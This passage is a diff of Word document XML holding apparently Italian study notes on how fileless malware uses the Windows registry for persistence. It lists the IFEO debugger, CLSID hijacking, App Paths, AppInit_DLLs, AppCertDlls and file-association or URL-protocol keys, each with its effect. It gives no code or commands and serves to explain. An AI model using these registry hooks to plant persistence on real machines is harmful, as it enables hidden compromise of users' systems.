+          <w:ilvl w:val="0"/>
+          <w:numId w:val="8"/>
+        </w:numPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">IFEO (Image File </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Execution</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Options):</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="8"/>
+        </w:numPr>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>CurrentVersion</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">\Image File </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Execution</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Options\&lt;programma.exe&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="8"/>
+        </w:numPr>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Valore:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> debugger</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="8"/>
+        </w:numPr>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
         </w:rPr>
         <w:t>Effetto:</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> Ogni volta che Windows ha bisogno di quel componente (spesso ogni pochi secondi), esegue il codice del malware. Essendo "fileless", il malware potrebbe puntare a uno script PowerShell memorizzato in un'altra chiave di registro.</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p/>
-    <w:p/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Ogni volta che l'utente lancia quel programma, Windows lancia il payload del malware.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="8"/>
+        </w:numPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>C</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">lass </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>O</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">bject </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>M</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>odel</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Hijacking</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (CLSID):</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="8"/>
+        </w:numPr>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>HKEY_CURRENT_USER</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>\Software\Classes\CLSID\{</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>GUID}\InprocServer32</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="8"/>
+        </w:numPr>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Tecnica:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Il malware inserisce il suo script qui. Poiché le chiavi HKCU hanno la precedenza su HKLM, Windows caricherà lo script malevolo invece della DLL di sistema originale.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="1440"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="8"/>
+        </w:numPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>AppPath</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Hijacking</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="8"/>
+        </w:numPr>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>CurrentVersion</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">\App </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Paths</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="8"/>
+        </w:numPr>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Effetto:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Modifica il percorso degli eseguibili richiamati tramite riga di comando.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>4. Iniezione di Codice e Caricamento DLL</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Utilizzate per forzare processi legittimi a caricare codice malevolo in memoria.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>AppInit_DLLs</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>CurrentVersion</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>\Windows\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>AppInit_DLLs</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Effetto:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Carica una DLL in ogni processo che utilizza user32.dll.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>AppCertDlls</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>HKEY_LOCAL_</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>MACHINE</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>\System\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>CurrentControlSet</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>\Control\Session Manager\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>AppCertDlls</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Effetto:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>Carica</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> DLL per ogni nuovo processo creato.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">5. Protocolli e Associazioni File (Shell </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Spawning</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Queste chiavi permettono l'attivazione del malware quando l'utente compie azioni quotidiane.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="10"/>
+        </w:numPr>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>File Association: HKEY_CLASSES_ROOT\&lt;estensione&gt;\shell\open\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>command</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="10"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Esempio:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Modificare l'apertura dei file .</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>txt</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> per lanciare uno script </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>PowerShell</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> prima di aprire il </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Notepad</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="10"/>
+        </w:numPr>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">URL </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Protocol</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>: HKEY_CLASSES_ROOT\&lt;protocollo&gt;\shell\open\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>command</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="10"/>
+        </w:numPr>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Esempio:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Creare o modificare protocolli come mailto: o </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>tel</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>: per eseguire codice quando si clicca su un link specifico nel browser.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Cosa scrivono i fileless malware sui registri</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Come abbiamo visto, i malware fileless sfruttano strumenti legittimi di sistema (Living off the Land </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Binaries</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> o </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>LOLBins</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>) per operare interamente in memoria. Il Registro di Sistema non viene quindi usato per ospitare il malware stesso, ma per memorizzare le istruzioni necessarie a ricostruirlo e avviarlo.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:sdt>
+      <w:sdtPr>
+        <w:id w:val="-303469538"/>
+        <w:docPartObj>
+          <w:docPartGallery w:val="Bibliographies"/>
+          <w:docPartUnique/>
+        </w:docPartObj>
+      </w:sdtPr>
+      <w:sdtEndPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:sdtEndPr>
+      <w:sdtContent>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="Titolo1"/>
+          </w:pPr>
+          <w:r>
+            <w:t>Bibliografia</w:t>
+          </w:r>
+        </w:p>
+        <w:sdt>
+          <w:sdtPr>
+            <w:id w:val="111145805"/>
+            <w:bibliography/>
+          </w:sdtPr>
+          <w:sdtContent>
+            <w:p>
+              <w:pPr>
+                <w:pStyle w:val="Bibliografia"/>
+                <w:ind w:left="720" w:hanging="720"/>
+                <w:rPr>
+                  <w:noProof/>
